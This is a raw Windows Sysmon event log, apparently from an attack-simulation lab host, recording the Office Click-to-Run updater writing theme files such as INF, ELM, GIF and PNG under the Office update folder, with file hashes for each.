14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RIPPLE\RIPPLE.ELMMD5=98E8E3D0B9E09D465A60FC226BDF3C22,SHA256=E89E5053FA6232DE5A707F2E1BA70E40690F3104E9DAC93623C88830A8EEB183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RIPPLE\PREVIEW.GIFMD5=08AE7D46BEB79C5BD85D09AF2724CCDF,SHA256=06EF2ACCCB2AB230B0A28290A031F815E01F95DF53C737357998A88144F0EF2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\THMBNAIL.PNGMD5=7EDEACD4460D65088DC948D93EDAC53D,SHA256=96731BD0D7865D4BA3D6EF34FEC552F1A9B06333CC29FB3CB179C18F8DEA33B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\RICEPAPR.INFMD5=CE234B2B8D4F7A256C028FCF3C0238D4,SHA256=D6E0F463EE96B0092FD8240C78AF217C9F4CC47459E3528636A4961F97C0AB40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\RICEPAPR.ELMMD5=F276D3B7C0B12271C78B98D8325D023A,SHA256=D62B91C3A22A87B437977A1452936B875A9AAB26508B9EE39007B2DF115C2D98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\PREVIEW.GIFMD5=1B0938265C2C3ECCE2930A98F838E1BF,SHA256=B73789EC8550A808D7EE60F0005C99551BAD4291540DC685F3E3A10F9476FE5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\THMBNAIL.PNGMD5=8B1655E53F24CFC0DDD16A15BEA72B7E,SHA256=65CB54155B2DA91E57D382681503144B6741DB596E0D4DC6ABE3EA5C234B98F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\REFINED.INFMD5=634E5F7602CBB0C683F9F792A6DAD900,SHA256=73465350790B4193A7190AE8F2E629A557DED90F3979936E4BCCF05E1AFBCFC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\REFINED.ELMMD5=BEE65C736F0DB7BED4A606D27886F864,SHA256=3315C6E2E3824A792A31C69DD6C93A158DE18AE0F19E107BEDEA995FBAC87EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\PREVIEW.GIFMD5=CC695CA905882EC8D1177F0D62349992,SHA256=E97023B97278ED6328E14CDCA748A5E1208A4829E9ABA56AB39C07880F50C7CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\THMBNAIL.PNGMD5=533241D7FCF0535CC308E34B45AA98F9,SHA256=B698C81F6FDDA70ACB0B6738766054F2E1C7CF1258E34165EBD9775F3FF94CE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\RADIAL.INFMD5=30769646A61F24F10149E5CA8CAE6310,SHA256=532D3F2BA329D07B582F7EFFB092E3F3CE294609B20B9B01DDC41B60BED8C567,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\RADIAL.ELMMD5=D0084F903D6FF7B0F774D041D8DD6D6D,SHA256=4BCA4BA812B3C59C9478802DD4740EFFB8C2BFBAE36DBB0BD0F7D21B79C85AAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\PREVIEW.GIFMD5=7E9C06CDA74E14E9ECB25DD3F8B950AC,SHA256=272561AC48179BFC9F2DC3CC808E451FDCFC64504F7528EEF5B3BEE979C8AF50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\THMBNAIL.PNGMD5=A3900BE6B4C76DB5C5AEAC6E7607DBD6,SHA256=5B3BD289494B3D4684D8BFA8415C8AADD98AAF76C6C4DD2F387F27227FEE7AA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\QUAD.INFMD5=F3A78C9205929CF3C050435248FA3498,SHA256=8308F3364A61C836FF468E71AC47FBE0F69591963E98129846D9B53EE0D4C8A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\QUAD.ELMMD5=B2281647E62E111FE2CB8795A06C7DC7,SHA256=10A16F6C2E28B9474FBBFB30077749DB0AC9ED9E58670174950FBE9935C198A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\PREVIEW.GIFMD5=5C6740CC8AB79265C401870ADFE80E4E,SHA256=B324F5C1ED94FE6047B27380188A628F0101A45D1974DB83B17C8BE2F6507BC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\THMBNAIL.PNGMD5=4FCE3E9E1CF91210A745EFA9E8F7F041,SHA256=0C6984F1A91080AE096FAAB445DCC454BD9232A32B8F5818258317215AA8B674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\PROFILE.INFMD5=B9FE6A8E5F66F30D1A3677642CEDE1CF,SHA256=9412573838B65A1C82AD6956E2D4637D54D43CC55FE7361A1A255D8FAC0C8798,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\PROFILE.ELMMD5=28DD35D32FAF2AEBA183107367143FE7,SHA256=203B9196FB89E4118B4748EC03ECE50DD60FC45BC1D9E3ED69E4B4F45B29CCD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\PREVIEW.GIFMD5=9CD4BADFDE60A89052F247BA3046C98D,SHA256=60F7F5A9837A3858A8BA4382D52EAA756F81D0C14A13E33E974F0D5AC94314DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNGMD5=C065AA3BE55CA2A62A8A3D968F7C4C3D,SHA256=66F6F2A7FB78E10F73FCF520CD4EB47C5D4BD4CBCDA3D417489F94B1E6465F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\PREVIEW.GIFMD5=24CCD91A1EE7475AE9ABF6E29A99FB22,SHA256=D87E0D12A05656AEF3A0BC364292E37C07F6AE7CE1C76B38728333D674585777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\PIXEL.INFMD5=60E4E9C6890926007E4CBFB17C2FF300,SHA256=1C8D066238FFB792E7EBCEFB9D49CE1350D44B9756A7146A464A9F1EC0AD6D7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\PIXEL.ELMMD5=67C0F1E8FF36D1F73AA6CB65C68C7126,SHA256=D1CCEA095B0A96CA869AAF287B69B5DFDC23FEE898827AAFE59FFD23DA545D21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\THMBNAIL.PNGMD5=20CA507434CF913F0869E4A463F114D6,SHA256=A258C15A96788EE5B391A038E19A85AAC27AD9D396AF2C0A815E5CE29846C861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PREVIEW.GIFMD5=F91F526D336EC18D3B0D8C4003E78A85,SHA256=CE453FCDBFDE8FEBD44316DACDDB0952E5E7867F60395A2EAA321829F677844B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.INFMD5=0D770DE864750611C25CC8B844352417,SHA256=51BE77A6562330D36007E2D5F45DAC0AE58E013FEB872FE8370979B2A35E3010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.ELMMD5=454F1FE52DDAC8279579674607B05742,SHA256=31112E5C15AF562E681434FAE97D18117C6B9BC65D58820A366D4FEE2D2C7A91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\THMBNAIL.PNGMD5=397AC5AC1AFBDAD453920DDD61221886,SHA256=A0E690FDD3D5550320A4DE2EB018AFE2DE61C5ED8F8A850006D13C5282A5B660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\PREVIEW.GIFMD5=89762BD26C0AF53967256137C8F79E79,SHA256=AF64AD86AD19E643CE61654EF6E90DD2A585A0543B760324E1A47120D27B19B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\NETWORK.INFMD5=45A92CB536DE147C246B284087B41DB8,SHA256=93CB4381D489CEFB2EB0520B09B9D1CB16EDC93A56F65335AFDCC445D22D4C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\NETWORK.ELMMD5=08D777F215AC90CEB70AE557894A84FE,SHA256=1828F8DAC138B89973E19698E64B9F832E612AB6F11C39BFF61FE9B321ABB4C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\THMBNAIL.PNGMD5=12562873E62C13D24AEE209244026068,SHA256=94EC0C324E328DBDC14C18240B3D1EB865E25EE2CBDCB40F61F017B2DB338D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\PREVIEW.GIFMD5=7A0FB57704C3CB75AF928C633FB5C3D3,SHA256=93FC30AB709689029FAC4B23285568658BB703405F3FEE92CC268B959AF41F75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.INFMD5=D90A37AA37866C3B8D711D24B29B27EB,SHA256=6B684994E46D7D7015ADA1E30EDAE87275ACEDA238C7DBD0130C5067B8646939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELMMD5=D0B2A52A880725F40208D6E1BDDB4396,SHA256=3748ECD9A67C888BE1D250ED9DD7782CC456057311B2887561BEE568FD3733CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\THMBNAIL.PNGMD5=9CB50C9E98E82E295AC45AAF90953B75,SHA256=802430C133012670873E85F5AF6656BA8F6CD5CED204413DFAE8566919E5B4E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\PREVIEW.GIFMD5=94839FFB68AFE8ADF144E0DC54A60872,SHA256=0307A5278A502F9E262A08F0480C83982E007F7CD6EC9452A0B5D1E12C9B0E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.INFMD5=666A26BBB90AB2BAF88A7EE82F056AA4,SHA256=0A293106355074C36237697B88F36E38B06B97F7BF5BBBB8A27B8FE54965AB86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft 